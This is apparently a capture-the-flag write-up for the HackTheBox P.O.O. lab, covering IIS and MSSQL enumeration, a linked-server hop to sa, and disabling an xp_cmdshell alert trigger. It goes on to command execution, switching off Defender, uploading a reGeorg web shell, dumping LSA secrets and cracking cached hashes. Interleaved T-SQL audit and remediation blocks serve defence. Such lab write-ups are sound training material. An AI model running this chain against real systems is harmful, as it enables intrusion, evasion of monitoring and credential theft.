xchg2pwn


Reversing and exploit development enthusiast



HackTheBox

P.O.O.



Recon

POO{fcfb0767f5bd3cbc22f40ff5011ad555}


We start by scanning the machine's ports with nmap and find only two open ports, an HTTP service and MSSQL; running the default recon scripts also reveals the domain the host belongs to.

❯ nmap -sCV 10.13.38.11
Nmap scan report for 10.13.38.11
PORT     STATE SERVICE
80/tcp   open  http
1433/tcp open  ms-sql-s
| ms-sql-ntlm-info: 
|   10.13.38.11:1433: 
|     Target_Name: POO
|     NetBIOS_Domain_Name: POO
|     NetBIOS_Computer_Name: COMPATIBILITY
|     DNS_Domain_Name: intranet.poo
|     DNS_Computer_Name: COMPATIBILITY.intranet.poo  
|     DNS_Tree_Name: intranet.poo
|_    Product_Version: 10.0.17763

Opening the site in a browser shows the default IIS page.

Fuzzing directories and files on the site with wfuzz turns up a fairly uncommon file, .ds_store, a macOS Finder artifact that stores metadata about the directory it was created in, including the names of the entries inside it.

❯ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -u http://10.13.38.11/FUZZ --hc 404 -t 100  
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.13.38.11/FUZZ
Total requests: 56293

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000003:   301        1 L      10 W       149 Ch      "images"
000000015:   301        1 L      10 W       145 Ch      "js"
000000043:   301        1 L      10 W       147 Ch      "test"
000000004:   401        29 L     100 W      1293 Ch     "admin"
000000011:   301        1 L      10 W       152 Ch      "templates"
000000012:   301        1 L      10 W       150 Ch      "plugins"
000000014:   301        1 L      10 W       149 Ch      "themes"
000000112:   301        1 L      10 W       150 Ch      "uploads"
000000391:   200        31 L     55 W       703 Ch      "."
000000231:   301        1 L      10 W       146 Ch      "dev"
000000734:   301        1 L      10 W       150 Ch      "widgets"
000001901:   301        1 L      10 W       151 Ch      "meta-inf"
000008565:   200        50 L     156 W      10244 Ch    ".ds_store"

We can use ds_walk to dump the information it contains; it reveals several paths, some of them named with MD5 hashes and each holding a folder called db.

❯ python3 ds_walk.py -u http://10.13.38.11/
[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://10.13.38.11//admin
[!] http://10.13.38.11//dev
[!] http://10.13.38.11//iisstart.htm
[!] http://10.13.38.11//Images
[!] http://10.13.38.11//JS
[!] http://10.13.38.11//META-INF
[!] http://10.13.38.11//New folder
[!] http://10.13.38.11//New folder (2)
[!] http://10.13.38.11//Plugins
[!] http://10.13.38.11//Templates
[!] http://10.13.38.11//Themes
[!] http://10.13.38.11//Uploads
[!] http://10.13.38.11//web.config
[!] http://10.13.38.11//Widgets
----------------------------
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/include  
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11//Images/buttons
[!] http://10.13.38.11//Images/icons
[!] http://10.13.38.11//Images/iisstart.png
----------------------------
[!] http://10.13.38.11//JS/custom
----------------------------
[!] http://10.13.38.11//Themes/default
----------------------------
[!] http://10.13.38.11//Widgets/CalendarEvents
[!] http://10.13.38.11//Widgets/Framework
[!] http://10.13.38.11//Widgets/Menu
[!] http://10.13.38.11//Widgets/Notifications
----------------------------
[!] http://10.13.38.11//Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11//Widgets/Framework/Layouts/custom
[!] http://10.13.38.11//Widgets/Framework/Layouts/default
----------------------------
[*] Finished traversing. No remaining .ds_store files present.
[*] Cleaning up .ds_store files saved to disk.

The folders named with MD5 hashes can easily be cracked on crackstation, but that actually gets us nowhere.

Besides that, we can see that IIS accepts short names (8.3 names): a wildcard request built from the first characters of a name plus the ~1 suffix tells us whether a matching directory or file exists.

❯ curl -s -X OPTIONS -I 'http://10.13.38.11/ta*~1*'  
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/10.0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Sun, 23 Apr 2023 17:28:37 GMT
Content-Length: 0

❯ curl -s -X OPTIONS -I 'http://10.13.38.11/te*~1*'  
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Sun, 23 Apr 2023 17:28:48 GMT
Content-Length: 1245

Running iis_shortname_scan against the db directory of one of the two hash folders finds a file whose name starts with poo_co, followed by something, and ends in .txt.

❯ python3 iis_shortname_scan.py http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db  
Server is vulnerable, please wait, scanning...
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/p~1.*      [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/po~1.*     [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo~1.*    [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_~1.*   [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_c~1.*  [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.t*        [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.tx*       [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*      [scan in progress]
[+] File /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*
----------------------------------------------------------------
0 Directories, 1 Files found in total
Note that * is a wildcard, matches any character zero or more times.

Following that logic we can build a wordlist containing only words that start with co, which leaves us a list of just 1248 lines.

❯ grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt > fuzz.txt  

❯ wc -l fuzz.txt
1248 fuzz.txt

Now we fuzz that part of the filename with wfuzz, and after a few seconds we find that connection returns 200: the file name is poo_connection.txt.

❯ wfuzz -c -w fuzz.txt -u http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt --hc 404 -t 100  
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt
Total requests: 1248

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000097:   200        6 L      7 W        142 Ch      "connection"

A simple curl to that path gives us the first flag, along with what look like cleartext credentials, probably for the database.

❯ curl http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt  
SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#

Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}


Huh?!

POO{88d829eb39f2d11697e689d779810d42}


Port 1433 is open, and using those credentials we can connect to MSSQL.

❯ impacket-mssqlclient intranet.poo/external_user:#p00Public3xt3rnalUs3r#@10.13.38.11  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.  
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
SQL>

Listing the databases, besides the default ones we find POO_PUBLIC, although there is nothing of real interest in it.

SQL> select name from sysdatabases;  

name
----------
master
tempdb
POO_PUBLIC

SQL>

The current user is external_user, the one we connected as.

SQL> select suser_name();  

-------------
external_user

SQL>

The only privilege we have on this server right now is to connect.

SQL> select permission_name from fn_my_permissions(null, null);  

permission_name
---------------
CONNECT SQL

SQL>

The name of the server currently in use is COMPATIBILITY\POO_PUBLIC.

SQL> select @@servername;  

------------------------
COMPATIBILITY\POO_PUBLIC

SQL>

However, that does not mean it is the only one: listing all the available server names we also find COMPATIBILITY\POO_CONFIG.

SQL> select srvname from sysservers;  

srvname
------------------------
COMPATIBILITY\POO_CONFIG
COMPATIBILITY\POO_PUBLIC

SQL>

With exec ... at we can run SQL queries on the poo_config server, which is configured as a linked server.

SQL> exec('select @@servername;') at [compatibility\poo_config];  

------------------------
COMPATIBILITY\POO_CONFIG

SQL>

This time the user running the queries on that server is internal_user.

SQL> exec('select suser_name();') at [compatibility\poo_config];  

-------------
internal_user

SQL>

However, our privileges on poo_config are exactly the same as on poo_public: only permission to connect.

SQL> exec('select permission_name from fn_my_permissions(null, null);') at [compatibility\poo_config];  

permission_name
---------------
CONNECT SQL

SQL>

Something worth trying is, from poo_public, running a query on poo_config that in turn runs a query back on poo_public.

SQL> exec('exec(''select @@servername;'') at [compatibility\poo_public];') at [compatibility\poo_config];  

------------------------
COMPATIBILITY\POO_PUBLIC

SQL>

It might look the same as running the queries directly, but when they go from poo_config back to poo_public they are executed as the sa user.

SQL> exec('exec(''select suser_name();'') at [compatibility\poo_public];') at [compatibility\poo_config];  

--
sa

SQL>

The sa user is the administrator, so if we now list our privileges we can do almost anything, since we have all of them.

SQL> exec('exec(''select permission_name from fn_my_permissions(null, null);'') at [compatibility\poo_public];') at [compatibility\poo_config];  

-------------------------------
CONNECT SQL
SHUTDOWN
CREATE ENDPOINT
CREATE ANY DATABASE
CREATE AVAILABILITY GROUP
ALTER ANY LOGIN
ALTER ANY CREDENTIAL
ALTER ANY ENDPOINT
ALTER ANY LINKED SERVER
ALTER ANY CONNECTION
ALTER ANY DATABASE
ALTER RESOURCES
ALTER SETTINGS
ALTER TRACE
ALTER ANY AVAILABILITY GROUP
ADMINISTER BULK OPERATIONS
AUTHENTICATE SERVER
EXTERNAL ACCESS ASSEMBLY
VIEW ANY DATABASE
VIEW ANY DEFINITION
VIEW SERVER STATE
CREATE DDL EVENT NOTIFICATION
CREATE TRACE EVENT NOTIFICATION
ALTER ANY EVENT NOTIFICATION
ALTER SERVER STATE
UNSAFE ASSEMBLY
ALTER ANY SERVER AUDIT
CREATE SERVER ROLE
ALTER ANY SERVER ROLE
ALTER ANY EVENT SESSION
CONNECT ANY DATABASE
IMPERSONATE ANY LOGIN
SELECT ALL USER SECURABLES
CONTROL SERVER

SQL>
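The loop above only works because the link from poo_config back to poo_public stores a fixed remote login (sa) instead of passing the caller's identity through. As an added example (not from the original writeup), this T-SQL audit lists every linked server with its login mappings and flags the dangerous ones; it assumes a sysadmin session on the instance being reviewed, and the server name in the remediation is the one from this box.

```sql
-- Audit of linked-server login mappings (added example, not from the writeup).
-- Run on each instance (here POO_PUBLIC and POO_CONFIG) as sysadmin.
-- A link whose remote_name is a sysadmin login (sa here) hands that privilege
-- to every local login allowed to use the link, which is the hop abused above.
SELECT
    s.name                      AS linked_server,
    s.data_source,
    s.is_rpc_out_enabled,       -- must be 1 for EXEC (...) AT [server] to work
    s.is_data_access_enabled,   -- needed for OPENQUERY / four-part names
    -- local_principal_id 0 is the catch-all mapping for "all other logins"
    COALESCE(sp.name, '<all other logins>') AS local_login,
    CASE
        WHEN ll.uses_self_credential = 1 THEN '<self (pass-through)>'
        ELSE ll.remote_name
    END                         AS remote_login,
    CASE
        WHEN ll.uses_self_credential = 0 AND ll.remote_name = 'sa'
            THEN 'HIGH: link runs as sa on the remote side'
        WHEN ll.uses_self_credential = 0 AND ll.remote_name IS NOT NULL
            THEN 'CHECK: fixed remote login, verify its rights on the remote instance'
        WHEN ll.uses_self_credential = 1
            THEN 'OK: caller keeps its own identity'
        ELSE 'INFO: no mapping, connection refused for this login'
    END                         AS assessment
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll
       ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp
       ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Remediation, to run on POO_CONFIG where the link back to POO_PUBLIC lives:
-- replace the stored sa credential with pass-through of the caller's identity
-- (then the second hop runs as internal_user again, not as sa) ...
EXEC sp_addlinkedsrvlogin
    @rmtsrvname = N'COMPATIBILITY\POO_PUBLIC',
    @useself    = N'TRUE';
-- ... and, if the link does not need remote procedure calls, turn off RPC OUT
-- so EXEC (...) AT is refused outright.
EXEC sp_serveroption N'COMPATIBILITY\POO_PUBLIC', 'rpc out', 'false';
```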

To work more comfortably we can create a login called pwned with a password and add it to the sysadmin role so it has every privilege.

SQL> exec('exec(''create login pwned with password = ''''password123#'''';'') at [compatibility\poo_public];') at [compatibility\poo_config];  
SQL> exec('exec(''sp_addsrvrolemember ''''pwned'''', ''''sysadmin'''';'') at [compatibility\poo_public];') at [compatibility\poo_config];  
SQL>

Now we can simply log in with the credentials we just defined.

❯ impacket-mssqlclient intranet.poo/pwned:password123#@10.13.38.11
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.  
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
SQL>

Now that we are administrators, listing all the databases reveals one we could not see before: the flag database.

SQL> select name from sysdatabases;  

name
----------
master
tempdb
model
msdb
POO_PUBLIC
flag

SQL>

We list the tables of the flag database and find only one table, flag.

SQL> select name from flag.sys.tables;  

name
----
flag

SQL>

We simply read its contents and it returns a flag column holding the flag.

SQL> select * from flag.dbo.flag;

flag
----------------------------------------  
b'POO{88d829eb39f2d11697e689d779810d42}'

SQL>


BackTrack

POO{4882bd2ccfd4b5318978540d9843729f}


We are sa, so we should be able to enable xp_cmdshell to run commands; however, doing so returns an error saying that an alert will be sent.

SQL> enable_xp_cmdshell
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.  
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 11: Attempt to enable xp_cmdshell detected. Database Administrators will be notified!
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 181: The transaction ended in the trigger. The batch has been aborted.
SQL>

A policy prevents us from enabling xp_cmdshell; to see the trigger responsible we can list the names of the enabled server triggers.

SQL> select name from sys.server_triggers;  

name                
-----------------
ALERT_xp_cmdshell

SQL>

We can simply disable the trigger and then enable xp_cmdshell.

SQL> disable trigger alert_xp_cmdshell on all server;
SQL> enable_xp_cmdshell
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.  
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL>

Now we can run commands on the system as a service user.

SQL> xp_cmdshell whoami

output
---------------------------  
nt service\mssql$poo_public

SQL>

We could think about getting a reverse shell, but we have a major limitation: there is no connectivity at all back to our machine.

SQL> xp_cmdshell ping 10.10.14.10

output
----------------------------------------------------------  

Pinging 10.10.14.10 with 32 bytes of data:
General failure.
General failure.
General failure.
General failure.

Ping statistics for 10.10.14.10:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

SQL>

Enumerating the server, in the wwwroot folder where the site is hosted we find a web.config file that may contain something interesting.

SQL> xp_cmdshell dir C:\inetpub\wwwroot

output
-----------------------------------------------------  

 Volume in drive C has no label.
 Volume Serial Number is F661-7669

 Directory of C:\inetpub\wwwroot

04/05/2023  05:24 AM    <DIR>          .
04/05/2023  05:24 AM    <DIR>          ..
02/19/2018  02:15 PM            10,244 .DS_Store
03/17/2018  12:56 PM    <DIR>          .Trashes
04/05/2023  05:40 AM    <DIR>          admin
03/17/2018  12:56 PM    <DIR>          dev
12/13/2019  04:58 AM               703 iisstart.htm
12/13/2019  04:58 AM            99,710 iisstart.png
03/17/2018  12:56 PM    <DIR>          Images
03/17/2018  12:56 PM    <DIR>          JS
03/17/2018  12:56 PM    <DIR>          META-INF
03/17/2018  12:56 PM    <DIR>          New folder
03/17/2018  12:56 PM    <DIR>          New folder (2)
03/17/2018  12:57 PM    <DIR>          Plugins
03/17/2018  12:57 PM    <DIR>          Templates
04/05/2023  05:24 AM    <DIR>          test
03/17/2018  12:57 PM    <DIR>          Themes
03/17/2018  12:57 PM    <DIR>          Uploads
04/04/2018  12:24 PM               728 web.config
03/17/2018  12:57 PM    <DIR>          Widgets

               4 File(s)        111,385 bytes
              16 Dir(s)   6,624,051,200 bytes free

SQL>

When we try to read it we find that the user has no permission to do so.

SQL> xp_cmdshell type C:\inetpub\wwwroot\web.config  

output
-----------------
Access is denied.

SQL>

There are other ways to run commands: with sp_execute_external_script we can run a system command through Python, this time as poo_public01.

SQL> sp_execute_external_script @language=N'python', @script=N'import os; os.system("whoami")';  
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:

compatibility\poo_public01

Express Edition will continue to be enforced.
SQL>
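A DDL trigger like ALERT_xp_cmdshell only alerts; any sysadmin can switch it off, as shown above, and sp_execute_external_script is a second execution path the trigger does not cover at all. As an added example (not from the writeup), this T-SQL checks the instance options behind both paths, lists server triggers and sysadmin members, and records the relevant actions in a server audit instead of trying to block them. It assumes sysadmin on COMPATIBILITY\POO_PUBLIC; the audit names and the file path C:\SQLAudit\ are placeholders.

```sql
-- Posture check and audit for the execution paths used on this box
-- (added example, not from the writeup). Run as sysadmin on the instance.

-- 1. Server triggers and their state: DISABLE TRIGGER ... ON ALL SERVER is one
--    statement for any sysadmin, so a trigger is an alert, not a control.
SELECT name, is_disabled, create_date, modify_date
FROM sys.server_triggers;

-- 2. Both command-execution paths are instance options; value_in_use = 1 means on.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'external scripts enabled', 'show advanced options');

-- 3. Current sysadmin members (a login named pwned was added above).
SELECT sp.name, sp.type_desc, sp.create_date
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r  ON r.principal_id  = rm.role_principal_id
JOIN sys.server_principals AS sp ON sp.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 4. Record rather than block: role membership changes (sp_addsrvrolemember),
--    login creation (CREATE LOGIN), server option changes (sp_configure) and
--    server-level object changes (linked servers, server triggers).
--    Placeholder names; the FILEPATH directory must already exist.
CREATE SERVER AUDIT audit_admin_actions
    TO FILE (FILEPATH = N'C:\SQLAudit\')
    WITH (ON_FAILURE = CONTINUE);
CREATE SERVER AUDIT SPECIFICATION spec_admin_actions
    FOR SERVER AUDIT audit_admin_actions
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP),
    ADD (SERVER_PRINCIPAL_CHANGE_GROUP),
    ADD (SERVER_OPERATION_GROUP),
    ADD (SERVER_OBJECT_CHANGE_GROUP)
    WITH (STATE = ON);
ALTER SERVER AUDIT audit_admin_actions WITH (STATE = ON);

-- 5. Clean-up of what this writeup changed on the instance.
IF EXISTS (SELECT 1 FROM sys.server_principals WHERE name = N'pwned')
    DROP LOGIN pwned;
ENABLE TRIGGER ALERT_xp_cmdshell ON ALL SERVER;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
-- 'external scripts enabled' only takes effect after a service restart.
EXEC sp_configure 'external scripts enabled', 0;
RECONFIGURE;
```

The audit log lands in the file target and can be read with sys.fn_get_audit_file, so the sp_addsrvrolemember and sp_configure calls from this writeup show up there even after the trigger is disabled.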

This user does have permission to read it; we see an XML structure, and a comment holds credentials to authenticate against /admin on the website.

SQL> sp_execute_external_script @language=N'python', @script=N'import os; os.system("type C:\inetpub\wwwroot\web.config")';  
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <staticContent>
            <mimeMap
                fileExtension=".DS_Store"
                mimeType="application/octet-stream"
            />
        </staticContent>
        <!--
        <authentication mode="Forms">
            <forms name="login" loginUrl="/admin">
                <credentials passwordFormat = "Clear">
                    <user
                        name="Administrator"
                        password="EverybodyWantsToWorkAtP.O.O."
                    />
                </credentials>
            </forms>
        </authentication>
        -->
    </system.webServer>
</configuration>

Express Edition will continue to be enforced.

SQL>

We make a simple curl request to the /admin directory, passing the credentials with the -u parameter, and the response contains the flag.

❯ curl http://10.13.38.11/admin/ -u Administrator:EverybodyWantsToWorkAtP.O.O.
"I can't go back to yesterday, because i was a different person then..."  
- Alice in Wonderland
Flag : POO{4882bd2ccfd4b5318978540d9843729f}


Foothold

POO{ff87c4fe10e2ef096f9a96a01c646f8f}


Let's follow the intended path: with ipconfig we can see the machine's IPv6 address.

SQL> xp_cmdshell ipconfig

output
--------------------------------------------------------------------  

Windows IP Configuration

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 172.20.128.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::21
   IPv6 Address. . . . . . . . . . . : dead:beef::1001
   IPv6 Address. . . . . . . . . . . : dead:beef::c2b:31da:7f3e:8a1d  
   Link-local IPv6 Address . . . . . : fe80::c2b:31da:7f3e:8a1d%5
   IPv4 Address. . . . . . . . . . . : 10.13.38.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : dead:beef::1
                                       fe80::250:56ff:feb9:deb9%5
                                       10.13.38.2

SQL> xp_cmdshell hostname

output
-------------
COMPATIBILITY

SQL>

Scanning again with nmap, this time over IPv6, we find port 5985, which is WinRM and, given credentials, lets us get a shell.

❯ nmap --min-rate 5000 -p- -6 dead:beef::1001  
Nmap scan report for dead:beef::1001
PORT     STATE SERVICE
80/tcp   open  http
1433/tcp open  ms-sql-s
5985/tcp open  wsman

To make things easier we add it to /etc/hosts with the hostname.

❯ echo 'dead:beef::1001 compatibility' | sudo tee -a /etc/hosts  

Earlier we found credentials for the website's /admin; reusing them with crackmapexec against WinRM returns Pwn3d!, meaning they are valid.

❯ crackmapexec winrm compatibility -u Administrator -p EverybodyWantsToWorkAtP.O.O.
SMB         compatibility   5985   NONE             [*] None (name:compatibility) (domain:None)
HTTP        compatibility   5985   NONE             [*] http://compatibility:5985/wsman
WINRM       compatibility   5985   NONE             [+] None\Administrator:EverybodyWantsToWorkAtP.O.O. (Pwn3d!)  

We can simply use evil-winrm to connect as Administrator and get a PowerShell on the machine with hostname compatibility.

❯ evil-winrm -i compatibility -u Administrator -p EverybodyWantsToWorkAtP.O.O.  
PS C:\Users\Administrator\Documents> whoami
compatibility\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
POO{ff87c4fe10e2ef096f9a96a01c646f8f}
PS C:\Users\Administrator\Documents>


p00ned

POO{1196ef8bc523f084ad1732a38a0851d6}


We can set up a proxy through the website using reGeorg, but before that we disable real-time antivirus scanning to avoid problems with the script.

PS C:\Users\Administrator\Documents> Set-MpPreference -DisableRealtimeMonitoring $true  
PS C:\Users\Administrator\Documents>

Now we upload tunnel.aspx to the wwwroot directory where the site is hosted.

PS C:\inetpub\wwwroot> upload tunnel.aspx

Info: Uploading tunnel.aspx to C:\inetpub\wwwroot\tunnel.aspx  

Data: 6612 bytes of 6612 bytes copied

Info: Upload successful!

PS C:\inetpub\wwwroot>

By default the site does not execute aspx, but we can easily install the feature.

PS C:\inetpub\wwwroot> dism /online /enable-feature /all /featurename:IIS-ASPNET45  

Deployment Image Servicing and Management tool
Version: 10.0.17763.771

Image Version: 10.0.17763.914

Enabling feature(s)

[==========================100.0%==========================]

The operation completed successfully.

PS C:\inetpub\wwwroot>

Now from our machine we run the reGeorg script with python2, pointing it at the aspx file on the site and creating a proxy on port 1080.

❯ python2 reGeorgSocksProxy.py -p 1080 -u http://10.13.38.11/tunnel.aspx
                     _____
  _____   ______  __|___  |__  ______  _____  _____   ______
 |     | |   ___||   ___|    ||   ___|/     \|     | |   ___|
 |     \ |   ___||   |  |    ||   ___||     ||     \ |   |  |
 |__|\__\|______||______|  __||______|\_____/|__|\__\|______|
                    |_____|
                    ... every office needs a tool like Georg

  willem@sensepost.com / @_w_m__
  sam@sensepost.com / @trowalts
  etienne@sensepost.com / @kamp_staaldraad

[INFO   ]  Log Level set to [INFO]
[INFO   ]  Starting socks server [127.0.0.1:1080], tunnel at [http://10.13.38.11/tunnel.aspx]  
[INFO   ]  Checking if Georg is ready
[INFO   ]  Georg says, 'All seems fine'

From the machine we can ping the DC to see its IPv4 address.

PS C:\Users\Administrator\Documents> ping dc

Pinging DC.intranet.poo [172.20.128.53] with 32 bytes of data:  
Reply from 172.20.128.53: bytes=32 time<1ms TTL=128
Reply from 172.20.128.53: bytes=32 time<1ms TTL=128
Reply from 172.20.128.53: bytes=32 time<1ms TTL=128
Reply from 172.20.128.53: bytes=32 time<1ms TTL=128

Ping statistics for 172.20.128.53:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

PS C:\Users\Administrator\Documents>

To work more comfortably we add the domain and the hostnames of the two machines we know exist to /etc/hosts so they resolve.

❯ tail -n2 /etc/hosts
172.20.128.53 intranet.poo dc.intranet.poo  
172.20.128.101 compatibility.intranet.poo  

Since we are local administrators we can dump the LSA secrets; doing so we find two hashes belonging to the users p00_dev and p00_adm.

❯ proxychains -q crackmapexec smb compatibility.intranet.poo -u Administrator -p EverybodyWantsToWorkAtP.O.O. --local-auth --lsa
SMB         compatibility.intranet.poo 445    COMPATIBILITY    [*] Windows Server 2019 Standard 17763 x64 (name:COMPATIBILITY) (domain:COMPATIBILITY) (signing:False) (SMBv1:True)
SMB         compatibility.intranet.poo 445    COMPATIBILITY    [+] COMPATIBILITY\Administrator:EverybodyWantsToWorkAtP.O.O. (Pwn3d!)
SMB         compatibility.intranet.poo 445    COMPATIBILITY    [+] Dumping LSA secrets
SMB         compatibility.intranet.poo 445    COMPATIBILITY    INTRANET.POO/p00_dev:$DCC2$10240#p00_dev#7afecfd48f35f666ae9f6edd53506d0c: (2018-03-22 15:45:01)
SMB         compatibility.intranet.poo 445    COMPATIBILITY    INTRANET.POO/p00_adm:$DCC2$10240#p00_adm#32c28e9a78d7c3e7d2f84cbfcabebeed: (2018-03-22 12:36:34)
SMB         compatibility.intranet.poo 445    COMPATIBILITY    POO\COMPATIBILITY$:aes256-cts-hmac-sha1-96:edf47cf46722c46d053fc55b21363683379245aef29bb438cf3913f74bad370d
SMB         compatibility.intranet.poo 445    COMPATIBILITY    POO\COMPATIBILITY$:aes128-cts-hmac-sha1-96:73cb8d33d34f3a3033e9677c32bfd8c2
SMB         compatibility.intranet.poo 445    COMPATIBILITY    POO\COMPATIBILITY$:des-cbc-md5:86b558e3a75df8ec
SMB         compatibility.intranet.poo 445    COMPATIBILITY    POO\COMPATIBILITY$:plain_password_hex:f752808d2fddd51b9592a4a7bebf36cb259411db659710089dcb2e18bea0070c79789a023eeeb5383b42b7a8943561d861dbd057ffe52f37a9531e5363abcaf7ec7a1a7b7db2703ba0fccca05f931362a18bfd93463b2a4b02c577a1b602404be60b4f124569d64195961eaaa78a69b414136907dc2ef90c3dd9196391f97e7e890b6331793dc7680a323dc16298663389ee53cbb6f1473f3d8d2de65ea5e372dcb790c5125bf6524ad2b6090ded3162a3b8e7ac13d7d3c0ab6f7107d908717dbca075fe58bf573556bd0e36215cd2f5a80ae2019ea10ced1f865b6e0e61fb8bc9398ffe6a275e7e00aca20f0da2d62e  
SMB         compatibility.intranet.poo 445    COMPATIBILITY    POO\COMPATIBILITY$:aad3b435b51404eeaad3b435b51404ee:f01ea0e3b625736fa3e0175d34593627:::
SMB         compatibility.intranet.poo 445    COMPATIBILITY    dpapi_machinekey:0x51d4bc23be8a2d1b3a3e2df21798f0c9b7d20e2b
dpapi_userkey:0x0684deff7ff5a560ba47a88f3d83ff2904dda1e1
SMB         compatibility.intranet.poo 445    COMPATIBILITY    NL$KM:994f5d6c55b9ecb50c0bd875a28893e4c0d9efc50db9405792399abe9da583ed11cb717cab32cd11fd7aed2eabbef16258f21d8aac9facfb3217d8eeb3bda5dc

To get p00_dev's password we can brute-force it with john using rockyou.txt, although the --rules parameter will be needed.

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashes --rules:d3ad0ne
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (mscash2, MS Cache Hash 2 (DCC2) [PBKDF2-SHA1 128/128 XOP 4x2])  
Press 'q' or Ctrl-C to abort, almost any other key for status
Development1!    (INTRANET.POO/p00_dev)
